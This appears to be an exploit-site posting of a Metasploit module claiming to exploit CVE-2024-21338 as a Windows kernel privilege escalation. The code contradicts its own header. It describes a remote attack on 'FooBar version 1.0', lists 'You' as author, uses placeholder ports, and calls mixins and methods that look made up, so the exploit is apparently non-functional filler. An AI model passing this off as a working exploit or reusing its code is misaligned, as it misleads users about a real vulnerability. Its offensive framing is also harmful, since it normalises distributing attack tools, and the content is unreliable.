#############################################
# Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation[出自:jiwo.org]
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)
register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end
def check
connect
begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
connect
begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end
handler
disconnect
end
end
#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338